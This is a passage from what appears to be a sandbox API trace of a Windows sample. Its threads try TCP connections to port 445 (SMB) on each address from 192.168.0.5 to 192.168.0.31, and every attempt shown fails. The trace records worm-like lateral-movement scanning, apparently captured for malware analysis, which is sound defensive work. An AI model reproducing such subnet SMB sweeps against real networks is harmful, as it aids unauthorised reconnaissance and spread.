(_String="192.168.0.5") returned 0xb [0143.293] wcstombs (in: _Dest=0x288cf70, _Source="192.168.0.5", _MaxCount=0xc | out: _Dest="192.168.0.5") returned 0xb [0143.293] htons (hostshort=0x1bd) returned 0xbd01 [0143.293] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0143.293] socket (af=2, type=1, protocol=0) returned 0x2e0 [0143.299] connect (s=0x2e0, name=0x383fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.5"), namelen=16) returned -1 [0164.520] GetCurrentThreadId () returned 0x210 [0164.520] GetCurrentThreadId () returned 0x210 [0164.520] longjmp () [0164.520] GetCurrentThreadId () returned 0x210 [0164.520] CloseHandle (hObject=0x270) returned 1 [0164.520] GetCurrentThreadId () returned 0x210 [0164.520] Sleep (dwMilliseconds=0x0) [0164.527] _endthreadex (_ReturnCode=0x0) Thread: id = 802 os_tid = 0xe78 [0143.294] GetCurrentThreadId () returned 0xe78 [0143.294] GetCurrentThreadId () returned 0xe78 [0143.294] GetCurrentThreadId () returned 0xe78 [0143.294] _errno () returned 0x60e638 [0143.294] wcslen (_String="192.168.0.6") returned 0xb [0143.294] wcstombs (in: _Dest=0x288df48, _Source="192.168.0.6", _MaxCount=0xc | out: _Dest="192.168.0.6") returned 0xb [0143.294] htons (hostshort=0x1bd) returned 0xbd01 [0143.294] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0143.294] socket (af=2, type=1, protocol=0) returned 0x2d8 [0143.298] connect (s=0x2d8, name=0x3a7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.6"), namelen=16) returned -1 [0164.520] GetCurrentThreadId () returned 0xe78 [0164.520] GetCurrentThreadId () returned 0xe78 [0164.520] longjmp () [0164.520] GetCurrentThreadId () returned 0xe78 [0164.520] CloseHandle (hObject=0x278) returned 1 [0164.520] GetCurrentThreadId () returned 0xe78 [0164.520] Sleep (dwMilliseconds=0x0) [0164.527] _endthreadex (_ReturnCode=0x0) Thread: id = 803 os_tid = 0xe44 [0143.294] GetCurrentThreadId () returned 0xe44 [0143.294] GetCurrentThreadId () returned 0xe44 [0143.294] GetCurrentThreadId () returned 0xe44 [0143.294] _errno () returned 0x2882428 [0143.294] wcslen (_String="192.168.0.7") returned 0xb [0143.294] wcstombs (in: _Dest=0x288ef20, _Source="192.168.0.7", _MaxCount=0xc | out: _Dest="192.168.0.7") returned 0xb [0143.294] htons (hostshort=0x1bd) returned 0xbd01 [0143.294] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0143.294] socket (af=2, type=1, protocol=0) returned 0x2d0 [0143.298] connect (s=0x2d0, name=0x3cbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.7"), namelen=16) returned -1 [0164.519] GetCurrentThreadId () returned 0xe44 [0164.519] GetCurrentThreadId () returned 0xe44 [0164.519] longjmp () [0164.519] GetCurrentThreadId () returned 0xe44 [0164.519] CloseHandle (hObject=0x254) returned 1 [0164.519] GetCurrentThreadId () returned 0xe44 [0164.519] Sleep (dwMilliseconds=0x0) [0164.526] _endthreadex (_ReturnCode=0x0) Thread: id = 804 os_tid = 0xe14 [0143.294] GetCurrentThreadId () returned 0xe14 [0143.294] GetCurrentThreadId () returned 0xe14 [0143.295] GetCurrentThreadId () returned 0xe14 [0143.295] _errno () returned 0x28828c8 [0143.295] wcslen (_String="192.168.0.8") returned 0xb [0143.295] wcstombs (in: _Dest=0x288fef8, _Source="192.168.0.8", _MaxCount=0xc | out: _Dest="192.168.0.8") returned 0xb [0143.295] htons (hostshort=0x1bd) returned 0xbd01 [0143.295] inet_addr (cp="192.168.0.8") returned 0x800a8c0 [0143.295] socket (af=2, type=1, protocol=0) returned 0x2c8 [0143.297] connect (s=0x2c8, name=0x3effe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.8"), namelen=16) returned -1 [0164.519] GetCurrentThreadId () returned 0xe14 [0164.519] GetCurrentThreadId () returned 0xe14 [0164.519] longjmp () [0164.519] GetCurrentThreadId () returned 0xe14 [0164.519] CloseHandle (hObject=0x28c) returned 1 [0164.519] GetCurrentThreadId () returned 0xe14 [0164.519] Sleep (dwMilliseconds=0x0) [0164.526] _endthreadex (_ReturnCode=0x0) Thread: id = 805 os_tid = 0xe8c [0143.302] GetCurrentThreadId () returned 0xe8c [0143.302] GetCurrentThreadId () returned 0xe8c [0143.302] GetCurrentThreadId () returned 0xe8c [0143.302] _errno () returned 0x2882ba8 [0143.302] wcslen (_String="192.168.0.9") returned 0xb [0143.302] wcstombs (in: _Dest=0x2890ed0, _Source="192.168.0.9", _MaxCount=0xc | out: _Dest="192.168.0.9") returned 0xb [0143.302] htons (hostshort=0x1bd) returned 0xbd01 [0143.302] inet_addr (cp="192.168.0.9") returned 0x900a8c0 [0143.302] socket (af=2, type=1, protocol=0) returned 0x300 [0143.302] connect (s=0x300, name=0x413fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.9"), namelen=16) returned -1 [0164.521] GetCurrentThreadId () returned 0xe8c [0164.521] GetCurrentThreadId () returned 0xe8c [0164.521] longjmp () [0164.521] GetCurrentThreadId () returned 0xe8c [0164.521] CloseHandle (hObject=0x294) returned 1 [0164.521] GetCurrentThreadId () returned 0xe8c [0164.521] Sleep (dwMilliseconds=0x0) [0164.529] _endthreadex (_ReturnCode=0x0) Thread: id = 806 os_tid = 0xe70 [0143.305] GetCurrentThreadId () returned 0xe70 [0143.305] GetCurrentThreadId () returned 0xe70 [0143.305] GetCurrentThreadId () returned 0xe70 [0143.305] _errno () returned 0x2891f70 [0143.305] wcslen (_String="192.168.0.10") returned 0xc [0143.305] wcstombs (in: _Dest=0x2892188, _Source="192.168.0.10", _MaxCount=0xd | out: _Dest="192.168.0.10") returned 0xc [0143.305] htons (hostshort=0x1bd) returned 0xbd01 [0143.305] inet_addr (cp="192.168.0.10") returned 0xa00a8c0 [0143.305] socket (af=2, type=1, protocol=0) returned 0x314 [0143.306] connect (s=0x314, name=0x437fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.10"), namelen=16) returned -1 [0164.521] GetCurrentThreadId () returned 0xe70 [0164.521] GetCurrentThreadId () returned 0xe70 [0164.521] longjmp () [0164.521] GetCurrentThreadId () returned 0xe70 [0164.521] CloseHandle (hObject=0x304) returned 1 [0164.521] GetCurrentThreadId () returned 0xe70 [0164.521] Sleep (dwMilliseconds=0x0) [0164.530] _endthreadex (_ReturnCode=0x0) Thread: id = 807 os_tid = 0xe6c [0143.307] GetCurrentThreadId () returned 0xe6c [0143.307] GetCurrentThreadId () returned 0xe6c [0143.307] GetCurrentThreadId () returned 0xe6c [0143.307] _errno () returned 0x2893388 [0143.308] wcslen (_String="192.168.0.11") returned 0xc [0143.308] wcstombs (in: _Dest=0x28935a0, _Source="192.168.0.11", _MaxCount=0xd | out: _Dest="192.168.0.11") returned 0xc [0143.308] htons (hostshort=0x1bd) returned 0xbd01 [0143.308] inet_addr (cp="192.168.0.11") returned 0xb00a8c0 [0143.308] socket (af=2, type=1, protocol=0) returned 0x328 [0143.308] connect (s=0x328, name=0x45bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.11"), namelen=16) returned -1 [0164.521] GetCurrentThreadId () returned 0xe6c [0164.521] GetCurrentThreadId () returned 0xe6c [0164.521] longjmp () [0164.521] GetCurrentThreadId () returned 0xe6c [0164.521] CloseHandle (hObject=0x318) returned 1 [0164.521] GetCurrentThreadId () returned 0xe6c [0164.521] Sleep (dwMilliseconds=0x0) [0164.531] _endthreadex (_ReturnCode=0x0) Thread: id = 808 os_tid = 0xe80 [0143.310] GetCurrentThreadId () returned 0xe80 [0143.310] GetCurrentThreadId () returned 0xe80 [0143.310] GetCurrentThreadId () returned 0xe80 [0143.310] _errno () returned 0x28947a0 [0143.310] wcslen (_String="192.168.0.12") returned 0xc [0143.310] wcstombs (in: _Dest=0x28949b8, _Source="192.168.0.12", _MaxCount=0xd | out: _Dest="192.168.0.12") returned 0xc [0143.310] htons (hostshort=0x1bd) returned 0xbd01 [0143.310] inet_addr (cp="192.168.0.12") returned 0xc00a8c0 [0143.310] socket (af=2, type=1, protocol=0) returned 0x33c [0143.310] connect (s=0x33c, name=0x47ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.12"), namelen=16) returned -1 [0164.521] GetCurrentThreadId () returned 0xe80 [0164.521] GetCurrentThreadId () returned 0xe80 [0164.521] longjmp () [0164.521] GetCurrentThreadId () returned 0xe80 [0164.521] CloseHandle (hObject=0x32c) returned 1 [0164.522] GetCurrentThreadId () returned 0xe80 [0164.522] Sleep (dwMilliseconds=0x0) [0164.531] _endthreadex (_ReturnCode=0x0) Thread: id = 809 os_tid = 0xe7c [0143.312] GetCurrentThreadId () returned 0xe7c [0143.312] GetCurrentThreadId () returned 0xe7c [0143.312] GetCurrentThreadId () returned 0xe7c [0143.312] _errno () returned 0x2895bb8 [0143.312] wcslen (_String="192.168.0.13") returned 0xc [0143.312] wcstombs (in: _Dest=0x2895dd0, _Source="192.168.0.13", _MaxCount=0xd | out: _Dest="192.168.0.13") returned 0xc [0143.312] htons (hostshort=0x1bd) returned 0xbd01 [0143.312] inet_addr (cp="192.168.0.13") returned 0xd00a8c0 [0143.313] socket (af=2, type=1, protocol=0) returned 0x350 [0143.313] connect (s=0x350, name=0x4a3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.13"), namelen=16) returned -1 [0164.522] GetCurrentThreadId () returned 0xe7c [0164.522] GetCurrentThreadId () returned 0xe7c [0164.522] longjmp () [0164.522] GetCurrentThreadId () returned 0xe7c [0164.522] CloseHandle (hObject=0x340) returned 1 [0164.522] GetCurrentThreadId () returned 0xe7c [0164.522] Sleep (dwMilliseconds=0x0) [0164.532] _endthreadex (_ReturnCode=0x0) Thread: id = 810 os_tid = 0x74c [0143.315] GetCurrentThreadId () returned 0x74c [0143.315] GetCurrentThreadId () returned 0x74c [0143.315] GetCurrentThreadId () returned 0x74c [0143.315] _errno () returned 0x2897450 [0143.315] wcslen (_String="192.168.0.14") returned 0xc [0143.315] wcstombs (in: _Dest=0x2898db0, _Source="192.168.0.14", _MaxCount=0xd | out: _Dest="192.168.0.14") returned 0xc [0143.315] htons (hostshort=0x1bd) returned 0xbd01 [0143.315] inet_addr (cp="192.168.0.14") returned 0xe00a8c0 [0143.315] socket (af=2, type=1, protocol=0) returned 0x364 [0143.315] connect (s=0x364, name=0x4c7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.14"), namelen=16) returned -1 [0164.522] GetCurrentThreadId () returned 0x74c [0164.522] GetCurrentThreadId () returned 0x74c [0164.522] longjmp () [0164.522] GetCurrentThreadId () returned 0x74c [0164.522] CloseHandle (hObject=0x354) returned 1 [0164.522] GetCurrentThreadId () returned 0x74c [0164.522] Sleep (dwMilliseconds=0x0) [0164.532] _endthreadex (_ReturnCode=0x0) Thread: id = 811 os_tid = 0xe28 [0143.317] GetCurrentThreadId () returned 0xe28 [0143.317] GetCurrentThreadId () returned 0xe28 [0143.317] GetCurrentThreadId () returned 0xe28 [0143.317] _errno () returned 0x2897678 [0143.317] wcslen (_String="192.168.0.15") returned 0xc [0143.317] wcstombs (in: _Dest=0x2899d88, _Source="192.168.0.15", _MaxCount=0xd | out: _Dest="192.168.0.15") returned 0xc [0143.317] htons (hostshort=0x1bd) returned 0xbd01 [0143.317] inet_addr (cp="192.168.0.15") returned 0xf00a8c0 [0143.317] socket (af=2, type=1, protocol=0) returned 0x378 [0143.318] connect (s=0x378, name=0x4ebfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.15"), namelen=16) returned -1 [0164.522] GetCurrentThreadId () returned 0xe28 [0164.522] GetCurrentThreadId () returned 0xe28 [0164.522] longjmp () [0164.522] GetCurrentThreadId () returned 0xe28 [0164.522] CloseHandle (hObject=0x368) returned 1 [0164.522] GetCurrentThreadId () returned 0xe28 [0164.522] Sleep (dwMilliseconds=0x0) [0164.533] _endthreadex (_ReturnCode=0x0) Thread: id = 812 os_tid = 0x544 [0143.320] GetCurrentThreadId () returned 0x544 [0143.320] GetCurrentThreadId () returned 0x544 [0143.320] GetCurrentThreadId () returned 0x544 [0143.320] _errno () returned 0x2897cf0 [0143.320] wcslen (_String="192.168.0.16") returned 0xc [0143.320] wcstombs (in: _Dest=0x289ad60, _Source="192.168.0.16", _MaxCount=0xd | out: _Dest="192.168.0.16") returned 0xc [0143.320] htons (hostshort=0x1bd) returned 0xbd01 [0143.320] inet_addr (cp="192.168.0.16") returned 0x1000a8c0 [0143.320] socket (af=2, type=1, protocol=0) returned 0x38c [0143.320] connect (s=0x38c, name=0x50ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.16"), namelen=16) returned -1 [0164.522] GetCurrentThreadId () returned 0x544 [0164.522] GetCurrentThreadId () returned 0x544 [0164.522] longjmp () [0164.522] GetCurrentThreadId () returned 0x544 [0164.522] CloseHandle (hObject=0x37c) returned 1 [0164.522] GetCurrentThreadId () returned 0x544 [0164.522] Sleep (dwMilliseconds=0x0) [0164.533] _endthreadex (_ReturnCode=0x0) Thread: id = 813 os_tid = 0xe90 [0143.322] GetCurrentThreadId () returned 0xe90 [0143.322] GetCurrentThreadId () returned 0xe90 [0143.322] GetCurrentThreadId () returned 0xe90 [0143.322] _errno () returned 0x2896dd8 [0143.322] wcslen (_String="192.168.0.17") returned 0xc [0143.322] wcstombs (in: _Dest=0x289bd38, _Source="192.168.0.17", _MaxCount=0xd | out: _Dest="192.168.0.17") returned 0xc [0143.322] htons (hostshort=0x1bd) returned 0xbd01 [0143.322] inet_addr (cp="192.168.0.17") returned 0x1100a8c0 [0143.322] socket (af=2, type=1, protocol=0) returned 0x3a0 [0143.322] connect (s=0x3a0, name=0x533fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.17"), namelen=16) returned -1 [0164.523] GetCurrentThreadId () returned 0xe90 [0164.523] GetCurrentThreadId () returned 0xe90 [0164.523] longjmp () [0164.523] GetCurrentThreadId () returned 0xe90 [0164.523] CloseHandle (hObject=0x390) returned 1 [0164.523] GetCurrentThreadId () returned 0xe90 [0164.523] Sleep (dwMilliseconds=0x0) [0164.534] _endthreadex (_ReturnCode=0x0) Thread: id = 814 os_tid = 0x420 [0143.324] GetCurrentThreadId () returned 0x420 [0143.324] GetCurrentThreadId () returned 0x420 [0143.324] GetCurrentThreadId () returned 0x420 [0143.324] _errno () returned 0x2897000 [0143.325] wcslen (_String="192.168.0.18") returned 0xc [0143.325] wcstombs (in: _Dest=0x28a1d60, _Source="192.168.0.18", _MaxCount=0xd | out: _Dest="192.168.0.18") returned 0xc [0143.325] htons (hostshort=0x1bd) returned 0xbd01 [0143.325] inet_addr (cp="192.168.0.18") returned 0x1200a8c0 [0143.325] socket (af=2, type=1, protocol=0) returned 0x3b4 [0143.325] connect (s=0x3b4, name=0x557fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.18"), namelen=16) returned -1 [0164.523] GetCurrentThreadId () returned 0x420 [0164.523] GetCurrentThreadId () returned 0x420 [0164.523] longjmp () [0164.523] GetCurrentThreadId () returned 0x420 [0164.523] CloseHandle (hObject=0x3a4) returned 1 [0164.523] GetCurrentThreadId () returned 0x420 [0164.523] Sleep (dwMilliseconds=0x0) [0164.535] _endthreadex (_ReturnCode=0x0) Thread: id = 815 os_tid = 0xe94 [0143.326] GetCurrentThreadId () returned 0xe94 [0143.326] GetCurrentThreadId () returned 0xe94 [0143.326] GetCurrentThreadId () returned 0xe94 [0143.326] _errno () returned 0x2897228 [0143.326] wcslen (_String="192.168.0.19") returned 0xc [0143.326] wcstombs (in: _Dest=0x28a0d58, _Source="192.168.0.19", _MaxCount=0xd | out: _Dest="192.168.0.19") returned 0xc [0143.326] htons (hostshort=0x1bd) returned 0xbd01 [0143.326] inet_addr (cp="192.168.0.19") returned 0x1300a8c0 [0143.326] socket (af=2, type=1, protocol=0) returned 0x3c8 [0143.327] connect (s=0x3c8, name=0x57bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.19"), namelen=16) returned -1 [0164.523] GetCurrentThreadId () returned 0xe94 [0164.523] GetCurrentThreadId () returned 0xe94 [0164.523] longjmp () [0164.523] GetCurrentThreadId () returned 0xe94 [0164.523] CloseHandle (hObject=0x3b8) returned 1 [0164.523] GetCurrentThreadId () returned 0xe94 [0164.523] Sleep (dwMilliseconds=0x0) [0164.535] _endthreadex (_ReturnCode=0x0) Thread: id = 816 os_tid = 0xe1c [0143.328] GetCurrentThreadId () returned 0xe1c [0143.328] GetCurrentThreadId () returned 0xe1c [0143.328] GetCurrentThreadId () returned 0xe1c [0143.328] _errno () returned 0x28978a0 [0143.328] wcslen (_String="192.168.0.20") returned 0xc [0143.328] wcstombs (in: _Dest=0x28a2d68, _Source="192.168.0.20", _MaxCount=0xd | out: _Dest="192.168.0.20") returned 0xc [0143.328] htons (hostshort=0x1bd) returned 0xbd01 [0143.328] inet_addr (cp="192.168.0.20") returned 0x1400a8c0 [0143.328] socket (af=2, type=1, protocol=0) returned 0x3dc [0143.328] connect (s=0x3dc, name=0x59ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.20"), namelen=16) returned -1 [0164.523] GetCurrentThreadId () returned 0xe1c [0164.523] GetCurrentThreadId () returned 0xe1c [0164.523] longjmp () [0164.523] GetCurrentThreadId () returned 0xe1c [0164.523] CloseHandle (hObject=0x3cc) returned 1 [0164.523] GetCurrentThreadId () returned 0xe1c [0164.523] Sleep (dwMilliseconds=0x0) [0164.536] _endthreadex (_ReturnCode=0x0) Thread: id = 817 os_tid = 0xe9c [0143.330] GetCurrentThreadId () returned 0xe9c [0143.330] GetCurrentThreadId () returned 0xe9c [0143.330] GetCurrentThreadId () returned 0xe9c [0143.330] _errno () returned 0x2897f18 [0143.330] wcslen (_String="192.168.0.21") returned 0xc [0143.330] wcstombs (in: _Dest=0x28a3d70, _Source="192.168.0.21", _MaxCount=0xd | out: _Dest="192.168.0.21") returned 0xc [0143.330] htons (hostshort=0x1bd) returned 0xbd01 [0143.330] inet_addr (cp="192.168.0.21") returned 0x1500a8c0 [0143.330] socket (af=2, type=1, protocol=0) returned 0x3f0 [0143.331] connect (s=0x3f0, name=0x5c3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.21"), namelen=16) returned -1 [0164.523] GetCurrentThreadId () returned 0xe9c [0164.523] GetCurrentThreadId () returned 0xe9c [0164.523] longjmp () [0164.523] GetCurrentThreadId () returned 0xe9c [0164.523] CloseHandle (hObject=0x3e0) returned 1 [0164.523] GetCurrentThreadId () returned 0xe9c [0164.523] Sleep (dwMilliseconds=0x0) [0164.536] _endthreadex (_ReturnCode=0x0) Thread: id = 818 os_tid = 0xebc [0143.332] GetCurrentThreadId () returned 0xebc [0143.332] GetCurrentThreadId () returned 0xebc [0143.332] GetCurrentThreadId () returned 0xebc [0143.332] _errno () returned 0x2897ac8 [0143.332] wcslen (_String="192.168.0.22") returned 0xc [0143.332] wcstombs (in: _Dest=0x289cd38, _Source="192.168.0.22", _MaxCount=0xd | out: _Dest="192.168.0.22") returned 0xc [0143.332] htons (hostshort=0x1bd) returned 0xbd01 [0143.332] inet_addr (cp="192.168.0.22") returned 0x1600a8c0 [0143.332] socket (af=2, type=1, protocol=0) returned 0x408 [0143.332] connect (s=0x408, name=0x5e7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.22"), namelen=16) returned -1 [0164.524] GetCurrentThreadId () returned 0xebc [0164.524] GetCurrentThreadId () returned 0xebc [0164.524] longjmp () [0164.524] GetCurrentThreadId () returned 0xebc [0164.524] CloseHandle (hObject=0x3f4) returned 1 [0164.524] GetCurrentThreadId () returned 0xebc [0164.524] Sleep (dwMilliseconds=0x0) [0164.537] _endthreadex (_ReturnCode=0x0) Thread: id = 819 os_tid = 0xee0 [0143.334] GetCurrentThreadId () returned 0xee0 [0143.334] GetCurrentThreadId () returned 0xee0 [0143.334] GetCurrentThreadId () returned 0xee0 [0143.334] _errno () returned 0x2898368 [0143.334] wcslen (_String="192.168.0.23") returned 0xc [0143.334] wcstombs (in: _Dest=0x28a4d78, _Source="192.168.0.23", _MaxCount=0xd | out: _Dest="192.168.0.23") returned 0xc [0143.334] htons (hostshort=0x1bd) returned 0xbd01 [0143.334] inet_addr (cp="192.168.0.23") returned 0x1700a8c0 [0143.334] socket (af=2, type=1, protocol=0) returned 0x41c [0143.334] connect (s=0x41c, name=0x60bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.23"), namelen=16) returned -1 [0164.524] GetCurrentThreadId () returned 0xee0 [0164.524] GetCurrentThreadId () returned 0xee0 [0164.524] longjmp () [0164.524] GetCurrentThreadId () returned 0xee0 [0164.524] CloseHandle (hObject=0x40c) returned 1 [0164.524] GetCurrentThreadId () returned 0xee0 [0164.524] Sleep (dwMilliseconds=0x0) [0164.537] _endthreadex (_ReturnCode=0x0) Thread: id = 820 os_tid = 0xec4 [0143.336] GetCurrentThreadId () returned 0xec4 [0143.336] GetCurrentThreadId () returned 0xec4 [0143.336] GetCurrentThreadId () returned 0xec4 [0143.336] _errno () returned 0x2898140 [0143.336] wcslen (_String="192.168.0.24") returned 0xc [0143.336] wcstombs (in: _Dest=0x289dd40, _Source="192.168.0.24", _MaxCount=0xd | out: _Dest="192.168.0.24") returned 0xc [0143.336] htons (hostshort=0x1bd) returned 0xbd01 [0143.336] inet_addr (cp="192.168.0.24") returned 0x1800a8c0 [0143.336] socket (af=2, type=1, protocol=0) returned 0x430 [0143.337] connect (s=0x430, name=0x62ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.24"), namelen=16) returned -1 [0164.524] GetCurrentThreadId () returned 0xec4 [0164.524] GetCurrentThreadId () returned 0xec4 [0164.524] longjmp () [0164.524] GetCurrentThreadId () returned 0xec4 [0164.524] CloseHandle (hObject=0x420) returned 1 [0164.524] GetCurrentThreadId () returned 0xec4 [0164.524] Sleep (dwMilliseconds=0x0) [0164.538] _endthreadex (_ReturnCode=0x0) Thread: id = 821 os_tid = 0xed8 [0143.338] GetCurrentThreadId () returned 0xed8 [0143.338] GetCurrentThreadId () returned 0xed8 [0143.339] GetCurrentThreadId () returned 0xed8 [0143.339] _errno () returned 0x28987b8 [0143.339] wcslen (_String="192.168.0.25") returned 0xc [0143.339] wcstombs (in: _Dest=0x28a5d80, _Source="192.168.0.25", _MaxCount=0xd | out: _Dest="192.168.0.25") returned 0xc [0143.339] htons (hostshort=0x1bd) returned 0xbd01 [0143.339] inet_addr (cp="192.168.0.25") returned 0x1900a8c0 [0143.339] socket (af=2, type=1, protocol=0) returned 0x444 [0143.339] connect (s=0x444, name=0x653fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.25"), namelen=16) returned -1 [0164.524] GetCurrentThreadId () returned 0xed8 [0164.524] GetCurrentThreadId () returned 0xed8 [0164.524] longjmp () [0164.524] GetCurrentThreadId () returned 0xed8 [0164.524] CloseHandle (hObject=0x434) returned 1 [0164.524] GetCurrentThreadId () returned 0xed8 [0164.524] Sleep (dwMilliseconds=0x0) [0164.538] _endthreadex (_ReturnCode=0x0) Thread: id = 822 os_tid = 0xedc [0143.340] GetCurrentThreadId () returned 0xedc [0143.340] GetCurrentThreadId () returned 0xedc [0143.340] GetCurrentThreadId () returned 0xedc [0143.340] _errno () returned 0x28989e0 [0143.340] wcslen (_String="192.168.0.26") returned 0xc [0143.340] wcstombs (in: _Dest=0x289ed48, _Source="192.168.0.26", _MaxCount=0xd | out: _Dest="192.168.0.26") returned 0xc [0143.340] htons (hostshort=0x1bd) returned 0xbd01 [0143.340] inet_addr (cp="192.168.0.26") returned 0x1a00a8c0 [0143.340] socket (af=2, type=1, protocol=0) returned 0x458 [0143.340] connect (s=0x458, name=0x677fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.26"), namelen=16) returned -1 [0164.524] GetCurrentThreadId () returned 0xedc [0164.524] GetCurrentThreadId () returned 0xedc [0164.524] longjmp () [0164.524] GetCurrentThreadId () returned 0xedc [0164.525] CloseHandle (hObject=0x448) returned 1 [0164.525] GetCurrentThreadId () returned 0xedc [0164.525] Sleep (dwMilliseconds=0x0) [0164.539] _endthreadex (_ReturnCode=0x0) Thread: id = 823 os_tid = 0xeb0 [0143.342] GetCurrentThreadId () returned 0xeb0 [0143.342] GetCurrentThreadId () returned 0xeb0 [0143.342] GetCurrentThreadId () returned 0xeb0 [0143.342] _errno () returned 0x28b2200 [0143.342] wcslen (_String="192.168.0.27") returned 0xc [0143.342] wcstombs (in: _Dest=0x28a6d88, _Source="192.168.0.27", _MaxCount=0xd | out: _Dest="192.168.0.27") returned 0xc [0143.342] htons (hostshort=0x1bd) returned 0xbd01 [0143.342] inet_addr (cp="192.168.0.27") returned 0x1b00a8c0 [0143.342] socket (af=2, type=1, protocol=0) returned 0x46c [0143.342] connect (s=0x46c, name=0x69bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.27"), namelen=16) returned -1 [0164.525] GetCurrentThreadId () returned 0xeb0 [0164.525] GetCurrentThreadId () returned 0xeb0 [0164.525] longjmp () [0164.525] GetCurrentThreadId () returned 0xeb0 [0164.525] CloseHandle (hObject=0x45c) returned 1 [0164.525] GetCurrentThreadId () returned 0xeb0 [0164.525] Sleep (dwMilliseconds=0x0) [0164.539] _endthreadex (_ReturnCode=0x0) Thread: id = 824 os_tid = 0xed4 [0143.344] GetCurrentThreadId () returned 0xed4 [0143.344] GetCurrentThreadId () returned 0xed4 [0143.344] GetCurrentThreadId () returned 0xed4 [0143.344] _errno () returned 0x28afd58 [0143.344] wcslen (_String="192.168.0.28") returned 0xc [0143.344] wcstombs (in: _Dest=0x289fd50, _Source="192.168.0.28", _MaxCount=0xd | out: _Dest="192.168.0.28") returned 0xc [0143.344] htons (hostshort=0x1bd) returned 0xbd01 [0143.344] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0143.344] socket (af=2, type=1, protocol=0) returned 0x480 [0143.345] connect (s=0x480, name=0x6bffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.28"), namelen=16) returned -1 [0164.525] GetCurrentThreadId () returned 0xed4 [0164.525] GetCurrentThreadId () returned 0xed4 [0164.525] longjmp () [0164.525] GetCurrentThreadId () returned 0xed4 [0164.525] CloseHandle (hObject=0x470) returned 1 [0164.525] GetCurrentThreadId () returned 0xed4 [0164.525] Sleep (dwMilliseconds=0x0) [0164.540] _endthreadex (_ReturnCode=0x0) Thread: id = 825 os_tid = 0xee8 [0143.347] GetCurrentThreadId () returned 0xee8 [0143.347] GetCurrentThreadId () returned 0xee8 [0143.347] GetCurrentThreadId () returned 0xee8 [0143.347] _errno () returned 0x28aff80 [0143.347] wcslen (_String="192.168.0.29") returned 0xc [0143.347] wcstombs (in: _Dest=0x28a7d90, _Source="192.168.0.29", _MaxCount=0xd | out: _Dest="192.168.0.29") returned 0xc [0143.347] htons (hostshort=0x1bd) returned 0xbd01 [0143.347] inet_addr (cp="192.168.0.29") returned 0x1d00a8c0 [0143.347] socket (af=2, type=1, protocol=0) returned 0x494 [0143.348] connect (s=0x494, name=0x6e3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.29"), namelen=16) returned -1 [0164.742] GetCurrentThreadId () returned 0xee8 [0164.742] GetCurrentThreadId () returned 0xee8 [0164.742] longjmp () [0164.742] GetCurrentThreadId () returned 0xee8 [0164.742] CloseHandle (hObject=0x484) returned 1 [0164.742] GetCurrentThreadId () returned 0xee8 [0164.742] Sleep (dwMilliseconds=0x0) [0164.748] _endthreadex (_ReturnCode=0x0) Thread: id = 826 os_tid = 0xeb4 [0143.352] GetCurrentThreadId () returned 0xeb4 [0143.352] GetCurrentThreadId () returned 0xeb4 [0143.352] GetCurrentThreadId () returned 0xeb4 [0143.352] _errno () returned 0x28b2878 [0143.352] wcslen (_String="192.168.0.30") returned 0xc [0143.352] wcstombs (in: _Dest=0x28a8d98, _Source="192.168.0.30", _MaxCount=0xd | out: _Dest="192.168.0.30") returned 0xc [0143.352] htons (hostshort=0x1bd) returned 0xbd01 [0143.352] inet_addr (cp="192.168.0.30") returned 0x1e00a8c0 [0143.352] socket (af=2, type=1, protocol=0) returned 0x4a8 [0143.352] connect (s=0x4a8, name=0x707fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.30"), namelen=16) returned -1 [0164.742] GetCurrentThreadId () returned 0xeb4 [0164.742] GetCurrentThreadId () returned 0xeb4 [0164.742] longjmp () [0164.742] GetCurrentThreadId () returned 0xeb4 [0164.742] CloseHandle (hObject=0x498) returned 1 [0164.742] GetCurrentThreadId () returned 0xeb4 [0164.742] Sleep (dwMilliseconds=0x0) [0164.749] _endthreadex (_ReturnCode=0x0) Thread: id = 827 os_tid = 0xe84 [0143.353] GetCurrentThreadId () returned 0xe84 [0143.353] GetCurrentThreadId () returned 0xe84 [0143.354] GetCurrentThreadId () returned 0xe84 [0143.354] _errno () returned 0x28b01a8 [0143.354] wcslen (_String="192.168.0.31") returned 0xc [0143.354] wcstombs (in: _Dest=0x28aada8, _Source="192.168.0.31", _MaxCount=0xd | out: _Dest="192.168.0.31") returned 0xc [0143.354] htons (hostshort=0x1bd) returned 0xbd01 [0143.354] inet_addr (cp="192.168.0.31") returned 0x1f00a8c0 [0143.354] socket (af=2, type=1, protocol=0) returned 0x4bc [0143.354] connect (s=0x4bc, name=0x72bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.31"), namelen=16) returned -1 [0164.742] GetCurrentThreadId () returned 0xe84 [0164.743] GetCurrentThreadId () returned 0xe84 [0164.743] longjmp () [0164.743] 